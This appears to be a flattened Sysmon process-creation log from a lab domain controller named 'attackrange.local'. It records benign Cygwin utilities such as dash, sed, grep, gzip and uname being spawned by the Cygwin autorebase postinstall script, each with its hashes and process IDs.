14:55:53.832{A8622C2F-53F9-6078-F007-00000000AE01}1536C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045428Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.823{A8622C2F-53F9-6078-EF07-00000000AE01}5312C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-ED07-00000000AE01}5664C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.816{A8622C2F-53F9-6078-EE07-00000000AE01}5052C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-EB07-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.815{A8622C2F-53F9-6078-ED07-00000000AE01}5664C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045395Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.807{A8622C2F-53F9-6078-EC07-00000000AE01}6440C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-EA07-00000000AE01}5996C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045393Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.807{A8622C2F-53F9-6078-EB07-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045382Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.799{A8622C2F-53F9-6078-EA07-00000000AE01}5996C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045367Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.791{A8622C2F-53F9-6078-E907-00000000AE01}6852C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-E807-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.784{A8622C2F-53F9-6078-E807-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045345Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.775{A8622C2F-53F9-6078-E707-00000000AE01}5212C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-E507-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045330Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.767{A8622C2F-53F9-6078-E607-00000000AE01}616C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-E307-00000000AE01}2112C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045328Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.767{A8622C2F-53F9-6078-E507-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.758{A8622C2F-53F9-6078-E407-00000000AE01}7016C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-E207-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045308Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.758{A8622C2F-53F9-6078-E307-00000000AE01}2112C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.751{A8622C2F-53F9-6078-E207-00000000AE01}6748C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045284Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.743{A8622C2F-53F9-6078-E107-00000000AE01}3912C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-E007-00000000AE01}3136C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045274Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.735{A8622C2F-53F9-6078-E007-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045260Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.722{A8622C2F-53F9-6078-DF07-00000000AE01}5084C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53F9-6078-DD07-00000000AE01}3300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.715{A8622C2F-53F9-6078-DE07-00000000AE01}6064C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53F9-6078-DB07-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045240Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.715{A8622C2F-53F9-6078-DD07-00000000AE01}3300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.707{A8622C2F-53F9-6078-DC07-00000000AE01}6032C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53F9-6078-DA07-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045222Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.707{A8622C2F-53F9-6078-DB07-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045209Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.698{A8622C2F-53F9-6078-DA07-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.690{A8622C2F-53F9-6078-D907-00000000AE01}4788C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-D807-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045187Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.683{A8622C2F-53F9-6078-D807-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.660{A8622C2F-53F9-6078-D707-00000000AE01}6196C:\cygwin64\bin\find.exe-----"C:\cygwin64\bin\find.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C17DC689E2E9C2AF759E7A3046DE8F1D,SHA256=77371827DA82B14D29999F738B77F53053833BE5C0257DC85E8A091ABB662789,IMPHASH=58AC74B0A7539EFE91A9196817FF689C{A8622C2F-53F9-6078-D607-00000000AE01}1844C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045165Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.653{A8622C2F-53F9-6078-D607-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045153Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.643{A8622C2F-53F9-6078-D507-00000000AE01}6884C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53F9-6078-D407-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045142Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.635{A8622C2F-53F9-6078-D407-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.626{A8622C2F-53F9-6078-D307-00000000AE01}4300C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53F9-6078-D207-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045122Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.619{A8622C2F-53F9-6078-D207-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045112Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.607{A8622C2F-53F9-6078-D107-00000000AE01}5864C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53F9-6078-D007-00000000AE01}4336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045102Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.600{A8622C2F-53F9-6078-D007-00000000AE01}4336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045092Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.588{A8622C2F-53F9-6078-CF07-00000000AE01}2084C:\cygwin64\bin\sort.exe-----"C:\cygwin64\bin\sort.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=C16D6C2C86D1FD3F76F369B857FC51D2,SHA256=9CF25F5A9D0DD784BEE8278A61C2429CBF04C32D3407B78A9F3B1D0500F7ACCA,IMPHASH=BAA25F5285129EA97CBED20CD70B6EC7{A8622C2F-53F9-6078-CD07-00000000AE01}2508C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045076Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.580{A8622C2F-53F9-6078-CE07-00000000AE01}3220C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53F9-6078-CC07-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045072Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.580{A8622C2F-53F9-6078-CD07-00000000AE01}2508C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-CB07-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045062Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.573{A8622C2F-53F9-6078-CC07-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-CB07-00000000AE01}6748C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045050Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.565{A8622C2F-53F9-6078-CB07-00000000AE01}6748C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045038Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.548{A8622C2F-53F9-6078-CA07-00000000AE01}6336C:\cygwin64\bin\uname.exe-----"C:\cygwin64\bin\uname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=75B3A9DE22D28DFE34FC8B0C747B1B1F,SHA256=5E34E4152BD98DB6D32A543A7812ECF543933905123FE5BF82B708B5EAC0E50D,IMPHASH=8B550AB258E8F33E9A5161733CA078D7{A8622C2F-53F9-6078-C907-00000000AE01}5096C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045028Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.540{A8622C2F-53F9-6078-C907-00000000AE01}5096C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000045016Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:53.532{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C707-00000000AE01}6700C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000045005Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:53.524{A8622C2F-53F9-6078-C707-00000000AE01}6700C:\cygwin64\bin\dash.exe-----C:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C107-00000000AE01}928C:\cygwin64\bin\dash.exeC:\cygwin64\bin\dash.exe "/etc/postinstall/0p_000_autorebase.dash" 154100x800000000000000044993Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 